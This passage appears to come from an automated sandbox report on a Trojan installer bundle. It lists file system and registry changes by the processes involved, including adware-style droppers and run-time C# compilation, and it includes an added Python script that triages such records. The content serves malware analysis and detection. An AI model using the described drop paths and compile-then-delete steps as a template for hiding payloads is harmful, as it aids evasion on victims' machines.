%WinDir%\assembly\tmp\UIMQUZ37\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
The process PSCustomSetupUtil.exe:3848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\7RVY147B\Microsoft.PowerShell.Security.resources.dll (9 bytes)
The process regsvr32.exe:3056 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (0 bytes)
The process regsvr32.exe:2700 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\obuwa\obuwa.exe (259 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (26169 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\69.87.192[1].htm (17186 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\69.87.192[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\clicker\clicker.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\obuwa\obuwa.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (0 bytes)
The process summit_sharma.exe:2672 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\YouTube Downloader.msi (7337 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\disk1.cab (6081 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC (0 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install (0 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0 (0 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\YouTube Downloader.msi (0 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\holder0.aiph (0 bytes)
%Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\disk1.cab (0 bytes)
The process 07-04-2016_hwopt_3.0.10-1.exe:1632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-MB3U6.tmp\07-04-2016_hwopt_3.0.10-1.tmp (3844 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-MB3U6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-MB3U6.tmp\07-04-2016_hwopt_3.0.10-1.tmp (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:2044 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.cmdline (426 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.0.cs (676 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.0.cs (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:1488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.0.cs (676 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.out (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.0.cs (676 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.tmp (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:1612 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.0.cs (676 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.tmp (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.0.cs (676 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.tmp (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:1848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.cmdline (426 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.0.cs (676 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.err (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:508 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.0.cs (676 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (591 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.dll (0 bytes)
The process InstallationStatsUploder_12052016001648.exe:1400 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\config\system (4112 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.cmdline (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.out (521 bytes)
%System%\config (672 bytes)
%System%\config\SYSTEM.LOG (8146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.0.cs (676 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.dll (0 bytes)
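Two patterns in the records above are worth pulling out automatically when triaging a report of this shape: the PSCustomSetupUtil.exe writes under %WinDir%\assembly\tmp\ (assemblies staged for the Global Assembly Cache), and the repeated sets of <8-character stem>.0.cs / .cmdline / .out / .err / .dll files written and then deleted by each InstallationStatsUploder_12052016001648.exe instance, which is the footprint of a .NET program compiling C# at run time through csc.exe (the csc.exe and cvtres.exe processes listed elsewhere on this page are the other half of that footprint). The script below is an added example, not part of the Lavasoft report and not code from the analysed sample: it parses the report's own record format ("The process X:PID makes changes in the file system." followed by write/delete markers and "path (N bytes)" lines), then flags the three behaviours. The sample input is a handful of records copied from this page; the eight-character stem pattern, the GAC staging path and the "executable dropped in the user's Temp" rule are the author's own triage heuristics, and a hit is a lead for a human, not a verdict, since legitimate .NET software (XmlSerializer, for example) produces the same csc.exe temp files.

```python
import re
from collections import defaultdict

# Constructed sample: a few records copied from the report above, in its own
# format. Not the full report.
SAMPLE = r"""
The process PSCustomSetupUtil.exe:2976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\H258BFIL\System.Management.Automation.dll (81046 bytes)
The process regsvr32.exe:3056 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
The process InstallationStatsUploder_12052016001648.exe:2044 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.out (521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.cmdline (426 bytes)
%WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.0.cs (676 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.0.cs (0 bytes)
"""

# Report grammar: a process header, then one or more action markers, each
# followed by "<path> (<size> bytes)" lines.
HEADER_RE = re.compile(r"^The process (?P<image>.+?):(?P<pid>\d+) makes changes in the file system\.$")
WRITES_RE = re.compile(r"^The Trojan creates and/or writes to the following file\(s\):$")
DELETES_RE = re.compile(r"^The Trojan deletes the following file\(s\):$")
ENTRY_RE = re.compile(r"^(?P<path>.+) \((?P<size>\d+) bytes\)$")

# Heuristics (author's assumptions, not from the report):
#  - csc.exe run-time compiles leave <8 random chars>.{0.cs,cmdline,out,err,tmp,dll} in Temp
#  - %WinDir%\assembly\tmp\ is where assemblies are staged before GAC installation
#  - an .exe/.dll written into the user's Temp is a dropped payload candidate
CSC_TEMP_RE = re.compile(r"\\Temp\\(?P<stem>[0-9a-z_]{8})\.(0\.cs|cmdline|out|err|tmp|dll)$", re.I)
GAC_STAGING_RE = re.compile(r"^%WinDir%\\assembly\\tmp\\", re.I)
USER_TEMP_EXE_RE = re.compile(r"\\Local Settings\\Temp\\[^\\]+\.(exe|dll)$", re.I)


def parse_report(text):
    """Turn the report text into a list of records:
    {image, pid, action ('write' | 'delete'), path, size}."""
    records = []
    image = pid = action = None
    for line in text.strip().splitlines():
        m = HEADER_RE.match(line)
        if m:
            image, pid, action = m["image"], int(m["pid"]), None
            continue
        if WRITES_RE.match(line):
            action = "write"
            continue
        if DELETES_RE.match(line):
            action = "delete"
            continue
        m = ENTRY_RE.match(line)
        if m and image and action:
            records.append({"image": image, "pid": pid, "action": action,
                            "path": m["path"], "size": int(m["size"])})
    return records


def triage(records):
    """Group the records into triage findings keyed by behaviour name."""
    findings = defaultdict(list)
    compile_sets = defaultdict(set)  # (image, pid, stem) -> extensions seen
    for r in records:
        m = CSC_TEMP_RE.search(r["path"])
        if m:
            # Both writes and deletes count: the report shows the .dll only at delete time.
            compile_sets[(r["image"], r["pid"], m["stem"])].add(m.group(2).lower())
        if r["action"] == "write" and GAC_STAGING_RE.match(r["path"]):
            findings["gac_staging"].append(r["path"])
        if r["action"] == "write" and USER_TEMP_EXE_RE.search(r["path"]):
            findings["user_temp_executable"].append(r["path"])
    for (image, pid, stem), exts in compile_sets.items():
        # A source file plus a csc response file is the minimum for a real compile.
        if {"0.cs", "cmdline"} <= exts:
            findings["runtime_compile"].append(f"{image}:{pid} stem={stem}")
    return dict(findings)


if __name__ == "__main__":
    for name, hits in triage(parse_report(SAMPLE)).items():
        print(name)
        for hit in hits:
            print("   ", hit)
```

Run against the full report, the runtime_compile finding repeats once per InstallationStatsUploder_12052016001648.exe PID (2044, 1488, 580, 1612, 640, 1848, 508, 1400), which is the quickest way to see that the compile is part of the installer's normal flow rather than a one-off; the deleted .dll and .err entries mean the generated assembly never survives on disk, so recovering its source means capturing the .0.cs file while the process runs.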
The process EditBinx86.exe:960 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\Utilsx86.dll (57 bytes)
The process EditBinx86.exe:2012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\Utilsx86.dll (57 bytes)
The process mofcomp.exe:2684 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpEA.tmp (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmpEA.tmp (0 bytes)
The process ngen.exe:332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1218 bytes)
The process ngen.exe:276 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (544 bytes)
The process ngen.exe:2092 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1072 bytes)
The process ngen.exe:3300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (752 bytes)
The process ngen.exe:2136 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1418 bytes)
The process ngen.exe:3212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1152 bytes)
The process ngen.exe:2056 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1162 bytes)
The process ngen.exe:3340 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1074 bytes)
The process ngen.exe:2248 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1442 bytes)
The process ngen.exe:3160 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (714 bytes)
The process ngen.exe:2112 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (740 bytes)
The process ngen.exe:2240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1108 bytes)
The process ngen.exe:3232 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1396 bytes)
The process ngen.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (848 bytes)
The process ngen.exe:1496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)
The process ngen.exe:2188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (436 bytes)
The process ngen.exe:2212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (768 bytes)
The process ngen.exe:2276 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (794 bytes)
The process ngen.exe:780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1468 bytes)
The process ngen.exe:3224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1454 bytes)
The process ngen.exe:2024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)
The process ngen.exe:2160 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1082 bytes)
The process ngen.exe:2148 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (738 bytes)
The process cvtres.exe:308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESE.tmp (2936 bytes)
The process cvtres.exe:1968 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES8.tmp (2936 bytes)
The process cvtres.exe:1556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESC.tmp (2936 bytes)
The process cvtres.exe:952 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES6.tmp (2936 bytes)
The process cvtres.exe:1064 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\RES14.tmp (2892 bytes)
The process cvtres.exe:340 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES12.tmp (2944 bytes)
The process cvtres.exe:164 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES10.tmp (2940 bytes)
The process cvtres.exe:504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES4.tmp (2936 bytes)
The process cvtres.exe:364 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESA.tmp (2936 bytes)
The process Osman_Navigation.exe:4072 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\setupapi.log (4240 bytes)
%Program Files%\FrivLauncher\FrivLauncher.exe (5054 bytes)
%Documents and Settings%\%current user%\Application Data\XBox\SETF8.tmp (44854 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp (4 bytes)
%Program Files%\FrivLauncher\uninst.exe (8693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\title.png (403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\topbg.png (1450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{01193C1E-21DF-4D50-8393-687E2938346B} (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\nsSkinEngine.dll (7767 bytes)
%Documents and Settings%\All Users\Desktop\FrivLauncher.lnk (730 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\XBLive.exe (191491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_feedback.png (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress_bg.png (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress.png (978 bytes)
%WinDir%\Temp\{CD2F8BB9-5758-4151-B5BB-E507B7C16422} (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_close.png (711 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\FrivLauncher\FrivLauncher.lnk (742 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\checkbox.png (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\DownloadInstall.dll (9043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\go184.7531c668845f402cb058ad10921a3520.zip (260891 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\Install.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\install.inf (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_big.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_small.png (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_min.png (237 bytes)
%Program Files%\FrivLauncher\FrivLauncher.exe.config (194 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\DownloadInstall.dll (0 bytes)
%Documents and Settings%\%current user%\Application Data\XBox\SETF8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\topbg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress_bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_close.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfF4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\go184.7531c668845f402cb058ad10921a3520.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_feedback.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\install.inf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\XBLive.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\Install.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_big.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_small.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_min.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\checkbox.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\nsSkinEngine.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\title.png (0 bytes)
The process PSSetupNativeUtils.exe:968 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
The process fileman.exe:1636 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\WinDivert.dll (18 bytes)
The process mastermind.exe:3740 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@demo1.geniesoftsystem[1].txt (1081 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\get_installation_detail[1].htm (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\getip[1].htm (43 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (388 bytes)
%Documents and Settings%\%current user%\Application Data\master\Master.exe (83494 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\master\uninstaller.exe (1987 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\master\MasterReports.dll (15300 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nspF9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\Math.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\UserInfo.dll (0 bytes)
The process hwopt12052016001648.exe:912 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\config (488 bytes)
%System%\config\system (7996 bytes)
%System%\config\SYSTEM.LOG (15882 bytes)
Registry activity
The process csc.exe:1992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 1F E7 ED 31 8D C9 F6 69 AE 57 1E BE DA 76 B6"
The process csc.exe:888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
